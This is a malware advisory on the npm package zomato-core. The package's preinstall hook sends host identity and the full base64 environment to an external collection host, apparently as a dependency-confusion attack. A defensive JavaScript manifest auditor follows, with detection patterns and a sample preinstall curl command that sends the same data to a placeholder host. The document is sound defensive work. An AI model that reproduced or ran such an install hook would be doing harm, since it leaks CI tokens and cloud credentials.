MAL-2026-6268
Malicious code in zomato-core (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5)

package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the entire base64-encoded process environment to http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/<base64-package-name> over plaintext HTTP. This fires automatically on `npm install` with no user opt-in, leaking host identity and any secrets present in environment variables (CI tokens, AWS/GCP credentials, npm publish tokens, etc.).

The package has no functional content — index.js is a one-line stub exporting `{ name: 'zomato-core', version: '1.0.0' }` — so the package exists solely as the exfiltration vehicle. The name and description impersonate an internal Zomato namespace (`zomato-core`, described as 'Zomato core utility library', repository `github.com/zomato/zomato-core`), consistent with a dependency-confusion attack against Zomato engineers and CI whose private internal `zomato-core` may resolve to this public registry copy.
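A manifest can be checked for this kind of install-time hook before the dependency is ever installed. The following is an added example, not code from the advisory or from the package: the function name `auditManifest`, the indicator patterns, and both sample manifests are constructed for illustration.

```javascript
// Lifecycle hooks npm runs automatically when a package is installed as a dependency.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Indicator patterns drawn from the behaviour this advisory describes (assumed, not exhaustive).
const INDICATORS = {
  'network-tool': /\b(curl|wget)\b/,
  'plaintext-http': /\bhttp:\/\//,
  'host-identity': /\b(hostname|whoami|pwd)\b/,
  'env-dump': /\b(printenv|env)\b/,
  'base64-encoding': /\bbase64\b/,
};

// Returns one finding per install hook, with the indicators it matched and a severity.
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const script = scripts[hook];
    if (typeof script !== 'string') continue;
    const indicators = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(script));
    const network = indicators.includes('network-tool') || indicators.includes('plaintext-http');
    const collects = indicators.includes('host-identity') || indicators.includes('env-dump');
    // Network access combined with host or environment collection is the pattern to block.
    const severity = network && collects ? 'high' : network ? 'medium' : 'low';
    findings.push({ hook, script, indicators, severity });
  }
  return findings;
}

// Constructed sample manifests (not the actual package contents).
const SUSPICIOUS = {
  name: 'example-internal-core',
  version: '1.0.0',
  scripts: {
    preinstall: 'curl -s -X POST -d "h=$(hostname)&u=$(whoami)&e=$(env | base64)" http://collector.example.invalid/install/ZXhhbXBsZQ==',
  },
};
const BENIGN = {
  name: 'example-native-addon',
  scripts: { postinstall: 'node-gyp rebuild', test: 'node test.js' },
};

for (const m of [SUSPICIOUS, BENIGN]) {
  for (const f of auditManifest(m)) {
    console.log(`${m.name}: ${f.hook} -> ${f.severity} [${f.indicators.join(', ')}]`);
  }
}
```

Installing with `npm install --ignore-scripts` keeps lifecycle hooks from running at all, which leaves time to review any manifest this audit flags.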
Affected packages
No fixed version published yet for zomato-core (npm). Pin to a known-safe version or switch to an alternative.